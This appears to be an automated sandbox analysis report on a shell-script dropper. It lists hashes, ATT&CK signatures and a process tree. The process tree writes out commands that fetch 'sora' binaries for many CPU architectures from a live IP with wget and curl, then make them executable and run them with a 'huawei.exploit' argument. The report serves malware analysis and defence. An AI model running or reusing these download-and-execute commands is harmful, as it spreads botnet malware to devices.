Analysis
-
max time kernel
12s -
max time network
13s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 02:36
Static task
static1
Behavioral task
behavioral1
Sample
bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
-
Size
2KB
-
MD5
8fcfb30b099ea7ed97a91208fa96c1b4
-
SHA1
c16ecb9186d8468336f7c654d5b214eb9300d87e
-
SHA256
bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300
-
SHA512
7df9e9bd9cb248605ec8defd1082b4ae474ad7d8b2170d213bdd82819156b4b8003149472e8099d62dd2685a038514da672bbe9ac0e60842286ae644ee7014c6
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 688 chmod 696 chmod 778 chmod 801 chmod 832 chmod 838 chmod 727 chmod 676 chmod 702 chmod 740 chmod 768 chmod 820 chmod 826 chmod 753 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 678 robben /tmp/robben 690 robben /tmp/robben 697 robben /tmp/robben 703 robben /tmp/robben 729 robben /tmp/robben 742 robben /tmp/robben 755 robben /tmp/robben 769 robben /tmp/robben 779 robben /tmp/robben 803 robben /tmp/robben 821 robben /tmp/robben 827 robben /tmp/robben 833 robben /tmp/robben 839 robben -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 680 wget 683 curl 687 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
Processes
-
/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh1⤵
- Writes file to tmp directory
PID:652 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:654
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Checks CPU configuration
- Reads runtime system information
PID:662
-
-
/bin/catcat sora.x862⤵PID:672
-
-
/bin/chmodchmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ2⤵
- File and Directory Permissions Modification
PID:676
-
-
/tmp/robben./robben huawei.exploit2⤵
- Executes dropped EXE
PID:678
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:680
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:683
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:687
-
-
/bin/chmodchmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ2⤵
- File and Directory Permissions Modification
PID:688
-
-
/tmp/robben./robben huawei.exploit2⤵
- Executes dropped EXE
PID:690
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:692
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
PID:694
-
-
/bin/catcat sora.x86_642⤵PID:695
-
-
/bin/chmodchmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ2⤵
- File and Directory Permissions Modification
PID:696
-
-
/tmp/robben./robben huawei.exploit2⤵
- Executes dropped EXE
PID:697
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:699
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Checks CPU configuration
- Reads runtime system information
PID:700
-
-
/bin/catcat sora.i4682⤵PID:701
-
-
/bin/chmodchmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ2⤵
- File and Directory Permissions Modification
PID:702
-
-
/tmp/robben./robben huawei.exploit2⤵
- Executes dropped EXE
PID:703
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:705
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Checks CPU configuration
- Reads runtime system information
PID:706
-
-
/bin/catcat sora.i6862⤵PID:725
-
-
/bin/chmodchmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/robben./robben huawei.exploit2⤵
- Executes dropped EXE
PID:729
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:732
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
PID:735
-
-
/bin/catcat sora.mpsl2⤵PID:739
-
-
/bin/chmodchmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/robben./robben huawei.exploit2⤵
- Executes dropped EXE
PID:742
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:744
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Checks CPU configuration
- Reads runtime system information
PID:747
-
-
/bin/catcat sora.arm42⤵PID:752
-
-
/bin/chmodchmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/robben./robben huawei.exploit2⤵
- Executes dropped EXE
PID:755
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:758
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Checks CPU configuration
- Reads runtime system information
PID:763
-
-
/bin/catcat sora.arm52⤵PID:766
-
-
/bin/chmodchmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/robben./robben huawei.exploit2⤵
- Executes dropped EXE
PID:769
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:773
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Checks CPU configuration
- Reads runtime system information
PID:775
-
-
/bin/catcat sora.arm62⤵PID:777
-
-
/bin/chmodchmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/robben./robben huawei.exploit2⤵
- Executes dropped EXE
PID:779
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:781
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Checks CPU configuration
- Reads runtime system information
PID:796
-
-
/bin/catcat sora.arm72⤵PID:799
-
-
/bin/chmodchmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/robben./robben huawei.exploit2⤵
- Executes dropped EXE
PID:803
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:805
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:808
-
-
/bin/catcat sora.ppc2⤵PID:819
-
-
/bin/chmodchmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/robben./robben huawei.exploit2⤵
- Executes dropped EXE
PID:821
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:823
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Checks CPU configuration
- Reads runtime system information
PID:824
-
-
/bin/catcat sora.ppc440fp2⤵PID:825
-
-
/bin/chmodchmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/robben./robben huawei.exploit2⤵
- Executes dropped EXE
PID:827
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:829
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
PID:830
-
-
/bin/catcat sora.m68k2⤵PID:831
-
-
/bin/chmodchmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/robben./robben huawei.exploit2⤵
- Executes dropped EXE
PID:833
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:835
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Checks CPU configuration
- Reads runtime system information
PID:836
-
-
/bin/catcat sora.sh42⤵PID:837
-
-
/bin/chmodchmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/robben./robben huawei.exploit2⤵
- Executes dropped EXE
PID:839
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1